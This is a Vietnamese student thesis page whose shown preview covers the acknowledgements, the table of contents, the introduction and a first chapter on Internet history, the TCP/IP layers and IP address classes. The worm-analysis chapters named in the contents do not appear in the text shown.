Đồ án Nghiên cứu kiến trúc mạng Internet, sự lây lan của Worm và cách phòng chống - Trần Thị Thủy

pdf 77 trang huongle 1470
Download
Bạn đang xem 20 trang mẫu của tài liệu "Đồ án Nghiên cứu kiến trúc mạng Internet, sự lây lan của Worm và cách phòng chống - Trần Thị Thủy", để tải tài liệu gốc về máy bạn click vào nút DOWNLOAD ở trên

Tài liệu đính kèm:

  • pdfdo_an_nghien_cuu_kien_truc_mang_internet_su_lay_lan_cua_worm.pdf

Nội dung text: Đồ án Nghiên cứu kiến trúc mạng Internet, sự lây lan của Worm và cách phòng chống - Trần Thị Thủy

  1. Khóa luận tốt nghiệp chống LỜI CẢM ƠN Em xin chân thành cảm ơn Tiến sĩ Hồ Văn Canh, người đã trực tiếp hướng dẫn tận tình chỉ bảo em trong suốt quá trình làm đề tài tốt nghiệp. Em xin chân thành cảm ơn tất cả các thầy cô giáo trong khoa Công nghệ thông tin - Trường ĐHDL Hải Phòng, những người đã nhiệt tình giảng dạy và truyền đạt những kiến thức cần thiết trong suốt thời gian em học tập tại trường, để em hoàn thành tốt đề tài này Tuy có nhiều cố gắng trong quá trình học tập cũng như trong thời gian thực hiện đề tài không thể tránh khỏi những thiếu sót, em rất mong được sự góp ý quý báu của tất cả các thầy cô giáo cũng như tất cả các bạn để kết quả của em được hoàn thiện hơn. Em xin chân thành cảm ơn! Hà Nội, ngày 28 tháng 6 năm 2009 Sinh viên Trần Thị Thúy. 1 Trần Thị Thúy_CT901
  2. Khóa luận tốt nghiệp chống MỤC LỤC LỜI MỞ ĐẦU 1 CHƢƠNG I: TỔNG QUAN VỀ INTERNET 1 1.1 Giới thiệu về Internet 2 1.1.1. Nguồn gốc của Internet. 2 1.1.2.Quản lý Internet. 3 1.1.3. Các dịch vụ mức ứng dụng ban đầu trên Internet 3 1.1.4. Dịch vụ mức mạng của Internet 4 1.2. Bộ giao thức TCP/IP 5 1.2.1 Giới thiệu 5 1.2.2. Phân tầng. 5 1.2.3. Địa chỉ Internet 13 1.2.4. Dịch vụ tên miền 16 1.2.5. Nhược điểm của TCP/IP 19 1.3. Giao thức không kết nối 20 1.3.1.Gói thông tin UDP 20 1.3.2. Phân kênh và hợp kênh 21 1.4. Giao thức điều khiển truyền tin 23 1.4.1. Điều khiển dòng dữ liệu 24 1.4.2. Thông báo lỗi 25 1.4.3. Định hướng lại 25 1.4.4. Kiểm tra trạm làm việc 25 1.5. Các dịch vụ mạng 26 1.5.1. Dịch vụ WEB 26 1.5.2. Dịch vụ truyền File 26 1.5.3.Dịch vụ truy nhập từ xa(Telnet) 26 1.5.4. Dịch vụ tra cứu theo chỉ mục 26 1.5.5. Dịch vụ nhóm tin 26 1.5.6. Dịch vụ tìm kiếm thông tin diện rộng 27 1.5.7. Dịch vụ tìm kiếm tên tệp 27 1.5.8. Dịch vụ hội thoại 27 1.5.9. Dịch vụ thư điện tử 27 1
  3. Khóa luận tốt nghiệp chống CHƢƠNG 2 : CÁCH THỨC HOẠT ĐỘNG CỦA SÂU MÁY TÍNH 30 2.1. Tổng quan về sâu máy tính (worm) 30 2.1.1. Khái niệm sâu 30 2.1.2. Sự phát triển của virus và worm 31 2.2. Macro virus 35 2.2.1. Khái niệm macro : 35 2.2.2. Phương thức lây nhiễm 36 2.2.3. Ví dụ mình họa 37 2.3. Phân tích cách thức hoạt động của một số sâu 42 2.3.1.Loveletter 42 2.3.2. Phân tích sâu Blaster 49 2.2.3. VBS-STAGES.A 52 CHƢƠNG 3 : CÁCH PHÒNG CHỐNG 56 3.1.Bức tƣờng lửa(Firewall) 56 3.1.1. Khái niệm về Firewall 56 3.1.2.1. Firewall lọc gói tin (Packet Filtering Firewall) 57 3.1.2.2. Firewall mức kết nối (Circuit Level Firewall) 58 3.1.2.3. Firewall mức ứng dụng (Application Level Firewall) 60 3.2. Một số biện pháp, thủ thuật phòng chống 62 3.2.1. Biện pháp phòng chống virus macro 62 3.2.2. Cách bảo vệ máy tính 63 3.2.3. Mười biện pháp bảo vệ máy tính khi dùng e-mail và Internet 67 3.2.4. Thủ thuật giúp tránh lây virus qua ngã email khi máy lỡ bị nhiễm virus 68 3.3. Sử dụng firewall để ngăn chặn sự bùng nổ của sâu máy tính 69 KẾT LUẬN 70 CÁC TÀI LIỆU THAM KHẢO 73 2
  4. Khóa luận tốt nghiệp chống LỜI MỞ ĐẦU Trong những năm gần đây ngành công nghệ thông tin được nhiều nước chú trọng đặc biệt. Bởi vì như chúng ta đã biết thế giới hôm nay là thế giới của thông tin. Mọi giao dịch buôn bán gần như đều được trao đổi trên mạng toàn cầu Internet. Chính Internet đã đem lại lợi nhuận cho nhiều người biết sử dụng khai thác nó. Cùng với những lợi ích to lớn mà Internet đem lại, cũng nảy sinh những vấn đề vô cùng phức tạp. Các thông tin cá nhân, thông tin kinh tế quan trọng của các tổ chức bị lộ, tài khoản ngân hàng bị đánh cắp, các hệ thống lưu cơ sở dữ liệu quan trọng bị phá hoại nhiều cuộc tấn công của các tin tặc đã gây thiệt hại hàng tỷ đô la của thế giới. Một trong những loại virus máy tính gây thiệt hại đến kinh tế, xã hội và an ninh trên mạng hiện nay đó chính là sử dụng các loại sâu máy tính (worm). Sâu máy tính được kết hợp với một số kỹ thuật tấn công khác sẽ tạo nên một khả năng rất mạnh đối với kẻ tấn công. Chúng có thể tự động len lỏi tìm đến các mục tiêu (máy tính được nối mạng) và lấy cắp những thông tin từ mục tiêu này mà người sử dụng không biết gì. Vậy sâu máy tính là gì? Cách thức hoạt động của nó như thế nào? Vì sao nó có thể gây thiệt hại hàng tỷ đô la? Cách phòng chống nó ra sao? Xuất phát từ những lý do trên em xin được tìm hiểu để tài : “Nghiên cứu kiến trúc mạng Internet, sự lây lan của Worm và cách phòng chống” với nội dung: Tổng quan về kiến trúc mạng Internet. Nắm rõ khái niệm của sâu máy tính (Worm), sự phát triển của sâu qua các thế hệ, cách thức hoạt động của sâu. Cuối cùng em đề xuất một số biện pháp phòng chống. Tìm hiểu một số kỹ thuật mà người viết mã sâu máy tính thường sử dụng. Tìm hiểu một số cách thức phát hiện, phòng chống các loại sâu. CHƢƠNG I: TỔNG QUAN VỀ INTERNET Trần Thị Thúy_ Lớp CT901 1
  5. Khóa luận tốt nghiệp chống 1.1 Giới thiệu về Internet 1.1.1. Nguồn gốc của Internet. Internet là một liên mạng máy tính lớn có phạm vi toàn cầu. Nó là một mạng của các mạng bao gồm hàng triệu máy tính trên toàn thế giới kết nối với nhau. Về nguồn gốc, tiền thân của Internet là mạng ARPANET. Tháng 6/1968, Cục các dự án nghiên cứu tiên tiến (Advanced Research Projcets Agency - viết tắt là ARPA) đã xây dựng dự án kết nối các trung tâm máy tính lớn trong toàn liên bang. Mùa thu năm 1969, 4 trạm đầu tiên được kết nối với nhau thành công, đánh dấu sự ra đời của ARPANET. Giao thức truyền thông dùng trong ARPANET lúc đó được đặt tên là Network Control Protocol (viết tắt là NCP). Tuy nhiên, xuất phát từ nhu cầu thực tế, các nhà thiết kế ARPANET ngay từ buổi đầu đó cũng đã nhận thức được cần xây dựng một “mạng của các mạng máy tính”. Giữa những năm 70, bộ giao thức TCP/IP được Vint Cerf và Robert Kahn phát triển, ban đầu cùng tồn tại với NCP và đến năm 1983 thì hoàn toàn thay thế NCP trong ARPANET Năm 1984, Bộ quốc phòng Mỹ chia ARPANET thành hai phần: ARPANET sử dụng cho nghiên cứu khoa học và Milinet sử dụng cho quân đội. Bước ngoặt trong lịch sử Internet xảy ra khi Ủy ban khoa học quốc gia của Mỹ(viết tắt NSF) bảo trợ cho 5 trung tâm siêu máy tính của toàn liên bang và kết nối chúng với nhau thành một mạng xương sống. Năm 1987, mạng NSFnet ra đời với tốc độ đường truyền nhanh hơn. NSFnet cho phép nối 7 mạng mới với các trung tâm siêu máy tính nói trên. Sự xuất hiện của mạng xương sống NFSnet và các mạng vùng đã thúc đẩy mạnh mẽ sự tăng trưởng của Internet. Một xa lộ thông tin được hình thành với sự tham gia của nhiều trường đại học, nhiều học viện nghiên cứu, các tổ chức chính phủ và cả giới kinh doanh trong cộng đồng Internet. Về mặt địa lý, Internet cũng nhanh chóng vươn tầm ra khỏi nước Mỹ, trở thành một mạng toàn cầu phục vụ hàng chục triệu người dùng trên toàn thế giới. Trần Thị Thúy_ Lớp CT901 2
  6. Khóa luận tốt nghiệp chống 1.1.2.Quản lý Internet. Thực tế là không có một cơ quan quản lý tối cao cho toàn bộ mạng Internet trên toàn thế giới. Một tổ chức có vai trò điều phối tối cao các hoạt động của Internet là Hiệp hội Internet (Internet Society – viết tắt là ISOC). Đây là một tổ chức phi lợi nhuận tập hợp các cá nhân và tổ chức tự nguyện tham gia vào các hoạt động nhằm khuyến khích và phát triển, sử dụng Internet trên toàn thế giới. Cơ quan lãnh đạo cao nhất của ISOC là ban kiến trúc Internet (Internet Architeture Boad – viết tắt là IAB). IAB họp đều đặn để xem xét các chuẩn liên quan và các quy định về cấp phát tài nguyên (như địa chỉ chẳng hạn). Một tổ chức tự nguyện khác trong khuôn khổ IAB, được gọi là Tiểu bạn đặc nhiệm kỹ thuật Internet (Internet Engineering Task Force – viết tắt là IETF) chịu trách nhiệm về các vấn đề kỹ thuật và tác nghiệp của Internet. Khi có một vấn đề được coi là đủ quan trọng thì IETF lập ra một nhóm làm việc để tiếp tục nghiên cứu. Mọi người đều có thể tham dự các cuộc họp của IETF và tham gia vào các nhóm làm việc. Việc phân phối địa chỉ cho các máy tính của người sử dụng (host) nối vào Internet ban đầu do chính ISOC trực tiếp đảm nhiệm. Nhưng từ năm 1992, do sự tăng trưởng quá nhanh của Internet nên công việc đó được phân cấp cho các trung tâm thông tin mạng (Network Information Center – viết tắt là NIC) của các khu vực đảm nhận. NIC của khu vưc Châu Á Thái Bình Dương – gọi là APNIC – có trụ sở tại Tokyo, Nhật Bản. ISOC khuyến khích phân cấp các NIC cho từng quốc gia, và hiện nay Việt Nam cũng đã thành lập VNNIC chịu trách nhiệm điều hành và phân phối địa chỉ cho các host của mình. 1.1.3. Các dịch vụ mức ứng dụng ban đầu trên Internet Thư điên tử (Electronic mail) cho phép người dùng ngồi trước máy tính tại nhà mình gửi E-mail tới bất cứ ai ở đâu trên thế giới nếu họ có địa chỉ E- mail. Họ có thể tham gia các nhóm thảo luận (discussion group) về những đề tài khác nhau hay bắt đầu một nhóm mới về những chủ đề mà họ ưa thích. Trần Thị Thúy_ Lớp CT901 3
  7. Khóa luận tốt nghiệp chống Truyền file (File Transfer) nếu cần một chương trình phần mềm mới như các tiện ích nén file, các chương trình diệt virus, một phần mềm trò chơi, hình ảnh hay âm thanh, người dùng có thể tải xuống bất cứ lúc nào với File Transfer Truy nhập từ xa (Remote login) có lẽ điều thú vị nhất trong các ứng dụng của Internet là Remote login, nó cho phép người dùng kết nối vào một máy tính ở xa như một trạm cuối để sử dụng máy tính đó. Ngày nay, nhiều dịch vụ Internet đã được phát triển và ứng dụng. Đó là : Thư điện tử W.W.W (world – wide – web) FIP (File Transfer Protocol) Telnet Video – IP V.V 1.1.4. Dịch vụ mức mạng của Internet Một lập trình viên viết chương trình ứng dụng trên Internet cần có một cái nhìn khác với người chỉ đơn giản sử dụng dịch vụ Internet. Ở tầng mạng Internet cung cấp 2 kiểu dịch vụ mà các ứng dụng của Internet thường dùng đó là Dịch vụ truyền không kết nối (Connectionless Paket Delivery Service) là một phương thức truyền dữ liệu mà các mạng chuyển mạch gói cung cấp. Điều này chỉ đơn giản là mạng Internet chuyển các gói tin từ máy này sang máy khác dựa vào thông tin địa chỉ của gói đến đích của nó. Việc chia nhỏ gói tin truyền này có một lợi điểm là nếu một đường đi bị bận hoặc bị đứt, thì các gói tin có thể được truyền theo một hướng khác. Dịch vụ truyền tin cậy (Reliable Stream Transport Service) phần lớn các ứng dụng đòi hỏi nhiều dịch vụ hơn chỉ truyền thông không kết nối bởi vì chúng cần tự động sửa lỗi, kiểm tra tính toàn vẹn của thông tin truyền đi trên mạng. Reliable Stream Transport Service giải quyết vấn đề này cho ta. Trần Thị Thúy_ Lớp CT901 4
  8. Khóa luận tốt nghiệp chống 1.2. Bộ giao thức TCP/IP Để truyền thông giữa các máy tính trên mạng Internet người ta phải thống nhất với nhau các quy tắc, quy ước để liên lạc, truyền thông, được gọi là các giao thức. Bộ giao thức mà Internet sử dụng là TCP/IP, thực chất là một bộ giao thức cùng làm việc với nhau để cung cấp phương tiện truyền thông trên mạng. Nó bao gồm nhiều giao thức thực hiện các chức năng khác nhau, trong đó có hai giao thức quan trọng nhất được dùng để đặt tên cho cả bộ giao thức là TCP (Transmission Control Protocol) và IP ( Internet Protocol). 1.2.1 Giới thiệu Bộ giao thức TCP/IP cho phép các máy tính với đủ loại kích cỡ, từ nhiều hãng sản xuất khác nhau, chạy trên các hệ điều hành hoàn toàn khác nhau có khả năng truyền thông, liên lạc được với nhau. Khả năng này là hoàn toàn vượt xa so với những dự tính ban đầu. Được bắt đầu cuối những năm 1960 như là một dự án nghiên cứu về các mạng chuyển mạch gói, cho tới những năm 1990, TCP/IP đã trở thành cách thức nối mạng máy tính được sử dụng rộng rãi nhất. TCP/IP thực sự là một hệ thống mở ở chỗ định nghĩa của bộ giao thức và nhiều cài đặt của nó đều được công khai và sẵn sàng cung cấp. Chính TCP/IP đã hình thành cơ sở cho liên mạng toàn cầu (Internet), một mạng diện rộng (WAN) với hàng triệu máy tính trên khắp thế giới nối với nhau. 1.2.2. Phân tầng. Các giao thức mạng thường được phát triển theo các tầng, mỗi tầng chịu trách nhiệm về một khía cạnh khác nhau của việc truyền thông, liên lạc. Một bộ giao thức, như TCP/IP chẳng hạn, là sự kết hợp của nhiều giao thức khác nhau thuộc nhiều tầng chức năng. TCP/IP thường được xem như một hệ thống 4 tầng, được mô tả trong hình 1.1 dưới đây. Chức năng của các lớp của bộ giao thức TCP/IP: 1. Lớp Link, đôi khi còn được gọi là lớp data _ link hoặc network interface, thường bao gồm trình điều khiển thiết bị trong hệ điều hành và card giao tiếp mạng tương ứng trong máy tính. Chúng cùng nhau xử lý tất cả các chi Trần Thị Thúy_ Lớp CT901 5
  9. Khóa luận tốt nghiệp chống tiết phần cứng của các giao tiếp vật lý với cable ( hoặc bất cứ kiểu phương tiện trung gian nào khác được sử dụng). Application Telnet, FTP, e – mail, etc Transport TCP, UDP Network IP, ICMP, IGMP Link Device driver and interface card Hình 1.1: Bốn lớp của bộ giao thức TCP/IP 2. Lớp Network (đôi khi còn gọi là lớp liên mạng – internet) xử lý việc vận chuyển các gói tin qua mạng. Ví dụ như dẫn đường cho các gói tin chẳng hạn. IP (Internet Protocol), ICMP (Internet Control Message Protocol) và IGMP (Internet Group Management Protocol) cung cấp lớp mạng trong bộ giao thức TCP/IP. 3. Lớp Transport cung cấp dòng dữ liệu giữa hai host cho lớp ứng dụng bên trên. Trong bộ giao thức TCP/IP có hai giao thức Transport khác biệt nhau: TCP và UDP. 1. TCP cung cấp dòng dữ liệu tin cậy giữa hai host. Nó nhận dữ liệu đến từ các ứng dụng và chia thành các khúc (chunk) có kích thước thích hợp cho lớp network bên dưới, báo nhận các gói tin nhận được, thiết lập timeout để chắc chắn rằng một đầu cuối khác báo nhận các gói tin đã được gửi rồi, Bởi vì lớp transport cung cấp dữ liệu tin cậy nên lớp ứng dụng có thể bỏ qua, không để ý đến những chi tiết này. 2. UDP lại khác hẳn, cung cấp cho lớp ứng dụng các dịch vụ đơn giản hơn nhiều. Nó chỉ gửi các gói dữ liệu gọi là datagram từ host này tới host khác, mà không đảm bảo rằng các gói tin đó sẽ đến được đích. Các chức năng đảm bảo tin cậy chỉ có thể được thêm vào ở lớp ứng dụng. Do đó, mỗi loại giao thức này được sử dụng bởi các ứng dụng khác nhau. Trần Thị Thúy_ Lớp CT901 6
  10. Khóa luận tốt nghiệp chống 4. Lớp Application xử lý các chi tiết của một ứng dụng đặc trưng. Có nhiều ứng dụng TCP/IP thông dụng mà hầu hết các cài đặt cung cấp: - Telnet cho đăng nhập từ xa. - FTP (File Transfer Protocol) giao thức truyền tệp. - SMTP (Simple Mail Transfer Protocol) cho thư điện tử. - SNMP (Simple Network Mannagement Protocol) và rất nhiều các ứng dụng khác nữa Chúng ta có thể so sánh kiến trúc 4 tầng của TCP/IP với kiến trúc 7 tầng của mô hình tham chiếu OSI ( Open System Interconnection) Application Layer Presentation Layer Application Layer Session Layer Transport Layer Transport Layer Network Layer Internet Layer Data link Layer Link Layer Physical Layer Nếu có hai host trong một mạng cục bộ (Local Area Network – LAN), như một Ethernet chẳng hạn, cùng chạy FTP, hình 1.2 chỉ ra các giao thức liên quan: Các tiến Xử lý các FTP protocol trình ngƣời chi tiết FTP FTP client server Trần Thị Thúy_ Lớp CT901 7 TCP TCP
  11. Khóa luận tốt nghiệp chống dùng ứng dụng Transport TCP protocol Network Kernel Xử lý các IP protocol chi tiết Application liên lạc Ethernet protocol Link Hình 1.2: Hai host trên một LAN cùng chạy FTP Chúng ta gán nhãn cho hai ứng dụng là FTP client và FTP server. Hầu hết các ứng dụng mạng được thiết kế sao cho một phía là client và phía kia là server. Server cung cấp một số loại dịch vụ cho các client, trong trường hợp này là truy nhập tới các tệp trên server host. Trong ứng dụng đăng nhập từ xa, Telnet, dịch vụ cung cấp cho client là khả năng truy cập tới các host của server. Mỗi lớp có một hoặc nhiều giao thức để truyền thông với lớp ngang hàng với nó. Trong ví dụ, một giao thức cho phép hai lớp TCP liên lạc với nhau, và một giao thức khác nhau cho phép hai lớp TCP liên lạc với nhau, và một giao thức khác cho phép hai lớp IP liên lạc với nhau. Bên phía phải của hình 1.2 ta thấy rằng thông thường lớp ứng dụng là một tiến trình của nguời dùng trong khi ba lớp thấp hơn thường được cài đặt trong nhân (kernel) hệ điều hành. Mặc dù không phải là một yêu cầu bắt buộc, nó mang tính điển hình và cũng là cách được hiện dưới hệ điều hành Unix. Có một sự khác nhau nữa giữa lớp trên cùng trong hình 1.2 và ba lớp bên dưới. Lớp ứng dụng thì quan tâm tới các chi tiết về ứng dụng và không quan tâm tới việc vận chuyển dữ liệu đi qua mạng. Ba lớp bên dưới không biết gì về ứng dụng nhưng chúng lại xử lý tất cả các chi tiết về truyền thông. Trần Thị Thúy_ Lớp CT901 8
  12. Khóa luận tốt nghiệp chống Chúng ta thể hiện bốn giao thức trong hình 1.2 ở bốn tầng khác nhau. FTP là giao thức của tầng ứng dụng (Application), TCP là giao thức của tầng vận chuyển (Transport), IP là giao thức của tầng mạng (Network) và Ethernet là giao thức hoạt động ở tầng liên kết (Link). Bộ giao thức TCP/IP, nhưng TCP và IP chỉ là hai trong số các giao thức của bộ giao thức đó. Ta có thể thấy rõ điều này qua hình vẽ bên dưới. Các giao thức trong hình bao gồm: FTP (File Transfer Protocol): Giao thức truyền tệp cho phép người dùng lấy hoặc gửi tệp tới một máy khác. Telnet: Giao thức đăng nhập từ xa cho phép người dùng từ trạm làm việc của mình có thể login vào một trạm ở xa qua mạng và làm việc với hệ thống y như là một trạm cuối nối trực tiếp với trạm ở xa đó. SMTP (Simple Mail Transfer Protocol): Giao thức thư tín điện tử. DNS (Domain Name Server): Dịch vụ tên miền cho phép nhận ra máy tính từ một tên miền thay cho chuỗi địa chỉ Internet khó nhớ. SNMP (Simple Network Management Protocol): Giao thức quản trị mạng cung cấp những công cụ quản trị mạng. RIP (Routing Internet Protocol): Giao thức dẫn đường động. ICMP (Internet Control Message Protocol): Giao thức điều khiển thông báo. UDP ( User Datagram Protocol): Giao thức truyền thông không kết nối cung cấp dịch vụ truyền không tin cậy nhưng tiết kiệm cho phí truyền. TCP (Transmission Control Protocol): Giao thức có kết nối cung cấp dịch vụ truyền thông tin cậy. IP (Internet Protocol): Giao thức Internet chuyển giao các gói tin qua mạng tới đích. ARP (Address Resolution Protocol): Giao thức chuyển địa chỉ TCP/IP thành địa chỉ vật lý của các thiết bị mạng. Trần Thị Thúy_ Lớp CT901 9
  13. Khóa luận tốt nghiệp chống FTP TELNET SMTP DNS SNMP Tầng ứng dụng RIP Tầng giao Transsmission User Datagram vận Control Protocol Protocol ICMP Tầng Internet Protocol Internet ARP Tầng mạng Ethernet Token Ring Token Bus FDDI Kiến trúc của TCP/IP Mục đích của lớp giao tiếp mạng và lớp ứng dụng rất rõ ràng. Lớp giao tiếp mạng xử lý các chi tiết về phương tiện truyền thống (Ethernet, Token Ring, ) trong khi lớp ứng dụng xử lý một ứng dụng người dùng đặc trưng (FPT, Telnet, ). Nhưng đối với lớp vận chuyển và lớp mạng, sự khác nhau khi nhìn thoáng qua là không rõ ràng. Một trong những lý do giải thích cho sự lớn mạnh phi thường của việc nối mạng trong những năm 1980 là sự nhận thức rõ được: Một máy tính đứng đơn lẻ như một hòn đảo sẽ không mang lại mấy ý nghĩa. Một vài hệ thống đứng một mình ( stand - alone) được tập hợp với nhau hình thành nên một mạng (network). Trong khi thực hiện điểu này, suốt những năm 1990, chúng ta lại nhận ra rằng: Hòn đảo mới bao gồm một mạng đơn, dù lớn hơn những cũng không phát huy được hết những khả năng tiềm tàng. Vì thế, người ta đã kết hợp nhiều mạng lại với nhau, hình thành nên một liên mạng (internet). Một liên mạng là tập hợp nhiều mạng cùng sử dụng chung một bộ giao thức. Trần Thị Thúy_ Lớp CT901 10
  14. Khóa luận tốt nghiệp chống Cách dễ nhất để xây dựng một liên mạng là kết nối hai hay nhiều mạng bằng một router. Đây là một thiết bị phần cứng có chức năng đặc biệt để kết nối các mạng. Ưu điểm của router là nó có thể kết nối nhiều mạng loại mạng vật lý khác nhau: Ethernet, Tolen Ring, các liên kết điểm – điểm (point to point), FDDI ( Fiber Distributed Data Interface), Các thiết bị này cũng còn được gọi là IP router, nhưng ta thường sử dụng thuật ngữ router. Trong lịch sử, các thiết bị này được gọi là các gateway. Thuật ngữ này được sử dụng rất nhiều khi nói về TCP/IP. Ngày nay, thuật ngữ “ Gateway” được sử dụng cho một gateway ứng dụng: Một tiến trình kết nối hai bộ giao thức khác nhau ( như TCP/IP và SNA của IBM) cho một ứng dụng riêng biệt đặc thù (thường là email hoặc truyền file). Hình 1.3 mô tả một liên mạng gồm hai mạng: Một Ethernet và một Token Ring, kết nối qua một router. Mặc dù chỉ thể hiện là có hai host liên lạc với nhau, nhưng với router kết nối hai mạng, bất kỳ host nào của Ethernet cũng có thể liên lạc với bất kỳ host nào của Token Ring. Trong hình 1.3, ta có thể phân biệt rõ ràng giữa một hệ thống cuối (end_system, là hai host ở hai phía) và một hệ thống trung gian (một router ở giữa). Lớp vận chuyển và lớp ứng dụng sử dụng các giao thức end – to – end. Hai lớp này chỉ cần trên các hệ thống cuối. Trong bộ giao thức TCP/IP, lớp mạng, IP, cung cấp dịch vụ không tin cậy. Bởi vì, nó chỉ thực hiện chuyển một gói tin từ nguồn tới đích cuối cùng mà không có sự đảm bảo nào. TCP thì khác, cung cấp giao thức tầng mạng tin cậy sử dụng dịch vụ không tin cậy của IP. Để thực hiện điều này, TCP thi hành timeout và truyền lại, gửi và nhận các báo nhận end – to – end, Tầng vận chuyển và tầng mạng có những nhiệm vụ riêng biệt. FTP FTP protocol FTP client Server Trần Thị Thúy_ Lớp CT901 TCP protocol 11 TCP TCP Router
  15. Khóa luận tốt nghiệp chống Ethernet Hình 1.3: Hai mạng kết nối qua một Router Một router, theo định nghĩa, có hai hay nhiều card giao tiếp mạng (vì lẽ nó kết nối hai hoặc nhiều mạng). Bất cứ hệ thống nào có nhiều giao tiếp đều được gọi là multihimed. Một host cũng có thể là một multihomed chỉ khi nó có đặc trưng là chuyển tiếp các gói tin từ một giao tiếp này tới một giao tiếp khác, nó không được gọi là router. Ngoài ra, các router không cần phải là các thiết bị phần cứng đặc biệt chỉ làm nhiệm vụ chuyển các gói tin từ một giao tiếp này tới một giao tiếp khác, nó không được gọi là router. Hầu hết các cài đặt của TCP/IP cho phép một multihomed host hoạt động như một router, nhưng host cần được cấu hình đặc trưng để thực hiện điều đó. Trong trường hợp này, ta có thể gọi hệ thống đó hoặc là một host (khi một ứng dụng như FTP hay Telnet được sử dụng), hoặc là một router (khi nó chuyển tiếp các gói tin từ một mạng tới mạng khác). Một trong những ưu điểm lớn của một liên mạng là nó che giấu tất cả những chi tiết về vật lý của liên mạng khỏi các ứng dụng. Mặc dù điều này là không được thể hiện rõ ràng ở liên mạng có hai mạng trong hình 1.3, các tầng ứng dụng không thể quan tâm (và không quan tâm) rằng host này trên Ethernet, Trần Thị Thúy_ Lớp CT901 12
  16. Khóa luận tốt nghiệp chống host kia trên Token Ring với một router ở giữa. Có thể có tới 20 router ở giữa, với các kết nối vật lý thêm vào, thì các ứng dụng vẫn chạy như nhau. Một cách khác để kết nối các mạng với bridge (cầu nối). Chúng kết nối các mạng này ở lớp link, trong khi router kết nối các mạng ở lớp network. Các bridge làm cho nhiều mạng LAN nối với nhau trở nên có vẻ như là chỉ một mạng LAN đối với các lớp ở bên trên. Các liên mạng TCP/IP hướng tới sử dụng router thay cho các bridge. 1.2.3. Địa chỉ Internet Mọi giao tiếp trên liên mạng phải có một địa chỉ Internet duy nhất (còn gọi là địa chỉ IP). Các địa chỉ này là các số 32 – bit. Thay vì sử dụng không gian địa chỉ phẳng như 1, 2, 3, ta có một cấu trúc cho các địa chỉ Internet. Hình 1.5 thể hiện 5 lớp khác nhau của các địa chỉ Internet. Các địa chỉ 32 – bit này thường được viết thành 4 số thập phân, mỗi số đại diện cho một byte địa chỉ. Cách dễ nhất để phân biệt giữa các lớp địa chỉ khác nhau là nhìn vào số đầu tiên của địa chi viết dưới dạng số thập phân với dấu chấm. Hình 1.6 thể hiện các lớp địa chỉ mạng khác nhau với số đầu tiên ở dạng in đậm. Nói ngắn gọn, một multihome host sẽ có nhiều địa chỉ IP: Mỗi giao tiếp có một địa chỉ. Bởi vì mọi giao tiếp trên một liên mạng đều phải có một địa chỉ IP duy nhất, cho nên, phải có một tổ chức trung tâm chịu trách nhiệm cấp phát các địa chỉ này cho các mạng kết nối vào Internet toàn cầu. Đó là Internet Network Information Center, được gọi là InterNIC. Nó làm nhiệm vụ cấp phát, ấn định các ID mạng (netid) duy nhất. Việc cấp phát các ID máy ( host ID) dành cho các quản trị viên hệ thống. 7 bits 24bits Trần Thị Thúy_ Lớp CT901 13
  17. Khóa luận tốt nghiệp chống Lớp A 0 Netid Hostid 14 bits 16 bits Lớp B 1 0 Netid hostid 21 bits 8 bits Lớp C 1 1 0 Netid hostid 28 bits Lớp D 1 1 1 0 Multicast group ID 27 bits Lớp E 1 1 1 1 0 (reserved for future use) Hình 1.5: Năm lớp địa Internet khác nhau Lớp Phạm vi địa chỉ A Từ 1.0.0.0 tới 127.255.255.255 B Từ 128.0.0.0 tới 191.255.255.255 C Từ 192.0.0.0 tới 223.255.255.255 D Từ 224.0.0.0 tới 239.255.255.255 E Từ 240.0.0.0 tới 255.255.255.255 Hình 1.6: Phạm vi của các lớp địa chỉ IP khác nhau Địa chỉ lớp A Trần Thị Thúy_ Lớp CT901 14
  18. Khóa luận tốt nghiệp chống Lớp A sử dụng byte đầu tiên của 4 byte để đánh địa chỉ mạng như hình trên, nó nhận ra bởi bits đầu tiên trong byte đầu tiên của địa chỉ có giá trị 0.3 byte còn lại được sử dụng để đánh địa chỉ máy trong mạng. Có 126 địa chỉ lớp A (được đánh địa chỉ trong byte thứ nhất) với số máy tính trong mạng là 2563 - 2 =16.777.214 máy cho mỗi một địa chỉ lớp A (do sử dụng 3 bytes để đánh địa chỉ máy). Địa chỉ lớp A thường được cấp cho những tổ chức có số lượng máy tính lớn. Nguyên nhân chỉ có 126 networks trong khi dùng 8 bits vì bits đầu tiên mang giá trị 0 dùng để định nghĩa lớp A vậy còn lại 7 bits đánh số từ 0 -127 tuy nhiên người ta không sử dụng một địa chỉ chứa toàn các con số 1 hoặc 0 do vậy, chỉ còn lại 126 mạng lớp A được sử dụng. Do vậy giá trị byte đầu tiên của địa chỉ lớp A sẽ luôn luôn nằm trong khoảng từ 1 tới 126, mỗi một byte trong 3 byte còn lại sẽ có giá trị trong khoảng 1 đến 254. Đối với việc chỉ có 16.777.214 máy trong khi sử dụng 24 bits đánh địa chỉ máy trong mạng cũng được giải thích tườn tự. Địa chỉ lớp A có dạng: Với con số thập phân đầu tiên nhỏ hơn 128 Ví dụ 9.6.7.8: Nút được gán Host ID là 6.7.8, nằm trong mạng lớp A có địa chỉ là 9.0.0.0 Địa chỉ lớp B Một địa chỉ lớp B được nhận ra bởi 2 bits đầu tiên của byte thứ nhất mang giá trị 10. Lớp B sử dụng 2 byte đầu tiên của 4 byte để đánh địa chỉ mạng và 2 byte cuối đánh địa chỉ máy trong mạng. Có 64 * 256 – 2 =16.128 địa chỉ mạng lớp B với 65.534 máy cho mỗi một địa chỉ lớp B. Địa chỉ lớp B có dạng: Byte đầu tiên của một địa chỉ lớp B nằm trong khoảng 128 tới 191. Ví dụ: 190.2.2.1: Nút được gán Host ID là 2.1, nằm trong mạng lớp B có địa chỉ là 190.2.0.0 Trần Thị Thúy_ Lớp CT901 15
